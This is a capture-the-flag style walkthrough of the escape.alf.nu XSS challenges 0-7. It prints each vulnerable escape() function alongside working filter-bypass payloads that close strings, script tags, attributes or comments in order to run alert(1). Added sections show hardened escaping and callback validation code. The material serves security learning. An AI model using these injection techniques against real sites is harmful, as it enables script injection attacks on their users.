Escape.alf.nu XSS challenges 0-7 One step-by-step learning XSS

Source: Internet
Author: User

This article link: http://blog.csdn.net/u012763794/article/details/51507593


The following challenges stem from: http://escape.alf.nu/


You will need some knowledge of HTML, CSS, JavaScript and regular expressions; if you do not have it yet, pick it up as you go.

I had done a little experimenting with this before:

Cross-site Scripting attack basics

http://blog.csdn.net/u012763794/article/details/45869479

XSS Advanced One

http://blog.csdn.net/u012763794/article/details/46429273

XSS Advanced Two

http://blog.csdn.net/u012763794/article/details/47177507

XSS Advanced Three

http://blog.csdn.net/u012763794/article/details/48215585


Challenge 0
function escape(s) {
  // Warmup.
  return '<script>console.log("' + s + '");</script>';
}
There is no filtering at all, so closing the double quote and the parenthesis is enough.
Payload:
"); alert(1);("

A comment works just as well:
"); alert(1);//



Challenge 1
function escape(s) {
  // Escaping scheme courtesy of Adobe Systems, Inc.
  s = s.replace(/"/g, '\\\"');
  return '<script>console.log("' + s + '");</script>';
}
A regular expression is used here. The g flag means global mode: after the first match is found, matching continues to the end of the string, so every double quote is replaced with \" (in the string literal '\\\"', the first \ escapes the second one and the third escapes the quote, so the text actually inserted is \").
Let's try a few experiments.
Trying it in the console confirms that " is replaced by \".
So how do we make our " effective? We have to "eat" that inserted \.

A \ of our own will eat the inserted \.
Payload: \"); alert(1);//
You can try this in the console too; to make s equal to \", you have to type \\" there, which gives the same result as above.
Most likely this is because the browser console treats \ as an escape character, while the challenge passes the string to the back end without treating \ as an escape, much like a single-quoted string in PHP; you can see the quotes are not highlighted there, whereas in JavaScript double-quoted strings \ is highlighted as an escape character.


Challenge 2
function escape(s) {
  s = JSON.stringify(s);
  return '<script>console.log(' + s + ');</script>';
}

The JSON.stringify() method serializes a JavaScript value into a JSON string.
Look at its basic usage first.

If we type in a double quote, or our usual payload, we can see that the whole string is wrapped in double quotes and the double quote we typed is escaped with \.
So instead we close the script tag.
Payload:
1. </script><script>alert(1)</script>  (this leaves a syntax error behind, but the alert still pops)
2. </script><script>alert(1)//

The error does not affect the execution of the code in the middle.
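The point of challenges 0-2 is that JSON.stringify() protects the JavaScript string context but not the HTML context around it. The following is an added example, not code from the challenge site: it puts the challenge 2 function beside a hardened version that also \u-escapes the angle brackets, and checks both against the three payloads above (the function names escapeNaive, jsonForScript, escapeHardened, breaksOut and compare are chosen here).

```javascript
// Added example, not the challenge's code: what JSON.stringify alone misses
// when the result is embedded in a <script> block (challenge 2).
function escapeNaive(s) {
  return '<script>console.log(' + JSON.stringify(s) + ');</script>';
}

// Hardened version: after JSON.stringify, turn "<" and ">" (and the two line
// terminators that JSON allows inside strings) into \uXXXX escapes. The HTML
// parser never sees a "</script>", and the text is still valid JSON and a
// valid JavaScript string literal, so console.log receives the original input.
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>\u2028\u2029]/g, function (c) {
    return '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0');
  });
}

function escapeHardened(s) {
  return '<script>console.log(' + jsonForScript(s) + ');</script>';
}

// More than one "</script" in the rendered block means the input closed the
// element early; this is the break-out the write-up uses in challenge 2.
function breaksOut(html) {
  return (html.match(/<\/script/gi) || []).length > 1;
}

// The three payloads from challenges 0-2, used here as constructed test input.
var PAYLOADS = ['"); alert(1);//', '\\"); alert(1);//', '</script><script>alert(1)//'];

// For each payload: does the naive output break out, does the hardened output
// break out, and does the escaped literal still decode to the original input?
function compare() {
  return PAYLOADS.map(function (p) {
    return {
      payload: p,
      naiveBreaksOut: breaksOut(escapeNaive(p)),
      hardenedBreaksOut: breaksOut(escapeHardened(p)),
      roundTrips: JSON.parse(jsonForScript(p)) === p
    };
  });
}
```

Only the challenge 2 payload defeats the naive version; the challenge 0 and 1 payloads are already neutralised by JSON.stringify, which is exactly why the write-up switches to closing the script tag there.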


Challenge 3
function escape(s) {
  var url = 'javascript:console.log(' + JSON.stringify(s) + ')';
  console.log(url);
  var a = document.createElement('a');
  a.href = url;
  document.body.appendChild(a);
  a.click();
}
Our input is built into a URL, a new hyperlink tag is created, the URL is put into its href, and the link is then clicked.
Trying it locally, we already know that JSON.stringify() escapes double quotes, as you can see.

But we can use URL encoding: the href is a URL, so %22 stands for a double quote and will work.

So the final payload is: %22);alert(1)//


Challenge 4
Code:
function escape(s) {
  var text = s.replace(/</g, '&lt;').replace('"', '&quot;');
  // URLs
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  // [[img123|Description]]
  // (this replacement string is cut off in the original write-up; restored from the challenge)
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img src="$1.gif" alt="$2">');
  return text;
}
The first thing to do is read the regular expressions; learn them quickly if you have to.
The first line turns < and " into HTML entity characters, but notice that the double-quote replace does not use the g flag, so only the first " is replaced.
The second line wraps any http:// URL in a link, putting it both into the href and into the link text; it does not seem useful here.
The third line is the key: [[a|b]] is replaced with an img tag, with a going into the $1 position and b into the $2 position.

So let's construct a payload using the onload event, which fires as soon as the page or image has finished loading. The site's judge may have a problem with it; onerror passes.
Payload: [[x|""onload=alert(1)"]] or [[x|"onload="alert(1)]]  Two double quotes are used: the first one is turned into an entity, the second one is not.

Challenge 5
Code
function escape(s) {
  // Level 4 had a typo, thanks Alok.
  // If your solution for 4 still works here, you can go back and get more points on level 4 now.
  var text = s.replace(/</g, '&lt;').replace(/"/g, '&quot;');
  // URLs
  text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>');
  // [[img123|Description]]
  // (this replacement string is cut off in the original write-up; restored from the challenge)
  text = text.replace(/\[\[(\w+)\|(.+?)\]\]/g, '<img src="$1.gif" alt="$2">');
  return text;
}
You can see the double-quote replace now uses the g flag.

So what do we do? This line can supply the double quotes for us: text = text.replace(/(http:\/\/\S+)/g, '<a href="$1">$1</a>'); where \S matches any non-whitespace character.
When we enter http://onload='alert(1)' it becomes <a href="http://onload='alert(1)'">http://onload='alert(1)'</a>

When we enter [[x|http://onload='alert(1)']], the URL replace runs first and turns it into [[x|<a href="http://onload='alert(1)']]">http://onload='alert(1)']]</a> (note that the href has swallowed the ]]). The img replace then turns this into <img src="x.gif" alt="<a href="http://onload='alert(1)'">">http://onload='alert(1)']]</a>

Now let's look at how the browser parses this, reading from left to right.
Matching single and double quotes, and angle brackets, from left to right as above, you can see there is only one img tag; the rest is discarded.
We copied the statement into an HTML file to check whether this is the case, and there is one difference: the // after http: becomes a space.
But I didn't get a pop-up; I changed it to onerror and then the alert fired.
Maybe the judge over there just has a problem with onload?
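Levels 4 and 5 show two defence failures at once: a non-global replace, and a chain of replace() calls where one rule's HTML output is re-scanned by the next rule. The following is an added example, not code from the challenge site: a single-pass rewrite of the same [[img|alt]] and URL rules that escapes each captured group as it is inserted (escapeAttr, TOKEN, render and samples are names chosen here; inside [[...]] the description is treated as plain text rather than linkified).

```javascript
// Added example, not the challenge's code. The level 4/5 filter fails twice:
// replace('"', '&quot;') without the g flag touches only the first quote, and
// the three replace() calls run one after another, so the <a href="..."> that
// the URL rule emits is scanned again by the [[img|alt]] rule. A safer shape
// escapes every character that matters in an attribute and does all the
// rewriting in one pass, so no rule ever sees another rule's output.
function escapeAttr(s) {
  var map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, function (c) { return map[c]; });
}

// One combined pattern; the replacer decides which alternative matched.
// Text inside [[...|...]] is treated as plain alt text, not linkified.
var TOKEN = /\[\[(\w+)\|(.+?)\]\]|(http:\/\/\S+)|[&<>"']/g;

function render(input) {
  return input.replace(TOKEN, function (m, img, alt, url) {
    if (img !== undefined) {
      return '<img src="' + escapeAttr(img) + '.gif" alt="' + escapeAttr(alt) + '">';
    }
    if (url !== undefined) {
      return '<a href="' + escapeAttr(url) + '">' + escapeAttr(url) + '</a>';
    }
    return escapeAttr(m); // a lone special character outside any markup
  });
}

// Constructed inputs: the level 5 trick, a level 4 style quote pair, a bare URL.
function samples() {
  return {
    level5: render("[[x|http://onload='alert(1)']]"),
    level4: render('[[x|""onload="alert(1)"]]'),
    bareUrl: render("http://onload='alert(1)'")
  };
}
```

Every quote that came from the input now appears as an entity inside the alt or href value, so the only attribute delimiters in the output are the ones the template itself wrote.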
Challenge 6
Code
function escape(s) {
  // Slightly too lazy to make two input fields.
  // Pass in something like "TextNode#foo"
  var m = s.split(/#/);

  // Only slightly contrived at this point.
  var a = document.createElement('div');
  a.appendChild(document['create' + m[0]].apply(document, m.slice(1)));
  return a.innerHTML;
}
The input is split on #; document['create' + m[0]] is equivalent to calling one of document's member functions, and there are many that begin with create.

apply is similar to call, with a slight difference (it takes the arguments as an array).
So how do we construct alert(1)? Element will not do, since it can only create a tag; but Comment attracts us, because we can type whatever we want into a comment and only need to close it. Payload: Comment#--><svg onload=alert(1) or Comment#><svg onload=alert(1)


Challenge 7
Code
function escape(s) {
  // Pass inn "callback#userdata"
  var thing = s.split(/#/);

  if (!/^[a-zA-Z\[\]']*$/.test(thing[0])) return 'Invalid callback';
  var obj = {'userdata': thing[1]};
  var json = JSON.stringify(obj).replace(/</g, '\\u003c');
  return "<script>" + thing[0] + "(" + json + ")</script>";
}
JSON.stringify(obj) escapes the double quotes, and .replace(/</g, '\\u003c') converts < into the Unicode escape \u003c. The callback check /^[a-zA-Z\[\]']*$/ still lets a single quote through, so we can use one to close what comes before, a semicolon to end that statement, and then a comment.

A multi-line comment also works, but something goes wrong with it.
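The level 7 bug is that the callback is validated as a set of allowed characters rather than as a callback name. The following is an added example, not code from the challenge site: the challenge's character allowlist beside an identifier-path check, wired into the same output shape (LOOSE_CALLBACK, STRICT_CALLBACK, isValidCallback, renderJsonp and check are names chosen here).

```javascript
// Added example, not the challenge's code. Level 7 validates the callback with
// /^[a-zA-Z\[\]']*$/, which allows a single quote, so "'" passes as a callback
// name and starts a string literal inside the emitted <script>. A callback
// should be validated as a dotted identifier path, not as a set of characters.
var LOOSE_CALLBACK = /^[a-zA-Z\[\]']*$/;                 // the challenge's rule
var STRICT_CALLBACK = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return STRICT_CALLBACK.test(name);
}

// Same output shape as the challenge, with the stricter check in front and
// ">" escaped alongside "<" so the JSON can never close the script element.
function renderJsonp(callback, userdata) {
  if (!isValidCallback(callback)) return 'Invalid callback';
  var json = JSON.stringify({ userdata: userdata }).replace(/[<>]/g, function (c) {
    return c === '<' ? '\\u003c' : '\\u003e';
  });
  return '<script>' + callback + '(' + json + ')</script>';
}

// Constructed inputs: a lone quote, brackets, a dotted path, and the
// challenge 2 payload placed in the userdata field.
function check() {
  return {
    looseAcceptsQuote: LOOSE_CALLBACK.test("'"),
    strictAcceptsQuote: isValidCallback("'"),
    strictAcceptsBrackets: isValidCallback('cb[0]'),
    strictAcceptsPath: isValidCallback('app.handlers.onData'),
    quoteCallback: renderJsonp("'", 'hello'),
    safeOutput: renderJsonp('cb', '</script><script>alert(1)//')
  };
}
```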
